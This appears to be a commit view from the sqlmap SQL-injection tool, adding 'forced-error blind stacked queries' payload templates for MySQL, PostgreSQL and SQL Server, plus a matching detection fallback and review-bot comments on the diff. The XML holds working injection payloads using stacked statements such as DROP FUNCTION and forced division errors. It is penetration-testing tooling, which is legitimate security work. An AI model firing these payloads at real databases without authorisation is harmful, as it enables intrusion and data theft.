			
		
		
		
	world premiere of "forced-error blind stacked" payloads (spent 3 hours on pgsql)
This commit is contained in:
		
							parent
							
								
									79e4b1efd5
								
							
						
					
					
						commit
						7c4c79477d
					
				|  | @ -50,6 +50,7 @@ from lib.core.exception import sqlmapUserQuitException | |||
| from lib.core.session import setDynamicMarkings | ||||
| from lib.core.settings import CONSTANT_RATIO | ||||
| from lib.core.settings import UNKNOWN_DBMS_VERSION | ||||
| from lib.core.settings import LOWER_RATIO_BOUND | ||||
| from lib.core.settings import UPPER_RATIO_BOUND | ||||
| from lib.core.threads import getCurrentThreadData | ||||
| from lib.core.unescaper import unescaper | ||||
|  | @ -315,6 +316,11 @@ def checkSqlInjection(place, parameter, value): | |||
|                             kb.matchRatio = None | ||||
|                             _ = Request.queryPage(cmpPayload, place, raise404=False) | ||||
| 
 | ||||
|                             # If in the comparing stage there was an error | ||||
|                             # then anything non-error will be considered as True | ||||
|                             if kb.errorIsNone and kb.matchRatio is None: | ||||
|                                 kb.matchRatio = LOWER_RATIO_BOUND | ||||
| 
 | ||||
|                             # Perform the test's True request | ||||
|                             trueResult = Request.queryPage(reqPayload, place, raise404=False) | ||||
| 
 | ||||
|  |  | |||
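Review bot: The new fallback `if kb.errorIsNone and kb.matchRatio is None:` keys on kb.errorIsNone, but the hunk only resets kb.matchRatio (`kb.matchRatio = None`) before the comparison request; if kb.errorIsNone is set elsewhere and not cleared per test, a stale value from an earlier test could force LOWER_RATIO_BOUND here and make a later non-error response compare as True spuriously. Worth confirming where it is cleared, or resetting it alongside the matchRatio reset. The added comment also leaves what kb.errorIsNone records implicit; suggest extending it, e.g. `# kb.errorIsNone: set when the comparison request produced an error page (confirm where it is set/cleared)`. checkSqlInjection starts and ends outside the hunk.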
|  | @ -1558,6 +1558,67 @@ Formats: | |||
|     <!-- End of stacked queries tests --> | ||||
| 
 | ||||
| 
 | ||||
|     <!-- Forced-error blind stacked queries tests --> | ||||
|     <test> | ||||
|         <title>MySQL forced-error blind stacked queries</title> | ||||
|         <stype>1</stype> | ||||
|         <level>3</level> | ||||
|         <risk>0</risk> | ||||
|         <clause>0</clause> | ||||
|         <where>1</where> | ||||
|         <vector>; IF(([INFERENCE]), SELECT [RANDNUM], DROP FUNCTION [RANDSTR]);</vector> | ||||
|         <request> | ||||
|             <payload>; IF(([RANDNUM]=[RANDNUM]), SELECT [RANDNUM], DROP FUNCTION [RANDSTR]);</payload> | ||||
|             <comment>#</comment> | ||||
|         </request> | ||||
|         <response> | ||||
|             <comparison>; IF(([RANDNUM]=[RANDNUM1]), SELECT [RANDNUM], DROP FUNCTION [RANDSTR]);</comparison> | ||||
|         </response> | ||||
|         <details> | ||||
|             <dbms>MySQL</dbms> | ||||
|         </details> | ||||
|     </test> | ||||
| 
 | ||||
|     <test> | ||||
|         <title>PostgreSQL forced-error blind stacked queries</title> | ||||
|         <stype>1</stype> | ||||
|         <level>3</level> | ||||
|         <risk>0</risk> | ||||
|         <clause>0</clause> | ||||
|         <where>2</where> | ||||
|         <vector>; SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/0 END);</vector> | ||||
|         <request> | ||||
|             <payload>; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/0 END);</payload> | ||||
|             <comment>--</comment> | ||||
|         </request> | ||||
|         <response> | ||||
|             <comparison>; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/0 END);</comparison> | ||||
|         </response> | ||||
|     </test> | ||||
| 
 | ||||
|     <test> | ||||
|         <title>Microsoft SQL Server/Sybase forced-error blind stacked queries</title> | ||||
|         <stype>1</stype> | ||||
|         <level>3</level> | ||||
|         <risk>0</risk> | ||||
|         <clause>0</clause> | ||||
|         <where>1</where> | ||||
|         <vector>; IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR];</vector> | ||||
|         <request> | ||||
|             <payload>; IF([RANDNUM]=[RANDNUM]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR];</payload> | ||||
|             <comment>--</comment> | ||||
|         </request> | ||||
|         <response> | ||||
|             <comparison>; IF([RANDNUM]=[RANDNUM1]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR];</comparison> | ||||
|         </response> | ||||
|         <details> | ||||
|             <dbms>Microsoft SQL Server</dbms> | ||||
|             <os>Windows</os> | ||||
|         </details> | ||||
|     </test> | ||||
|     <!-- End of forced-error blind stacked queries tests --> | ||||
| 
 | ||||
| 
 | ||||
|     <!-- AND time-based blind tests --> | ||||
|     <test> | ||||
|         <title>MySQL > 5.0.11 AND time-based blind</title> | ||||
|  |  | |||
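Review bot: The PostgreSQL test (`<title>PostgreSQL forced-error blind stacked queries</title>`) has no `<details>` block, unlike the MySQL and Microsoft SQL Server tests in the same hunk, so unless an absent details element is meant as "unrestricted" it will not be scoped to PostgreSQL the way its siblings are; add `<details>`, `<dbms>PostgreSQL</dbms>`, `</details>` after its `</response>`. The third test's title names Sybase but its `<dbms>` lists only Microsoft SQL Server; if Sybase is meant to be covered, the details should say so, otherwise the title should drop it. The PostgreSQL test's `<where>2</where>` also differs from the other two tests' `<where>1</where>` with no comment explaining why, which is worth a one-line note in the XML.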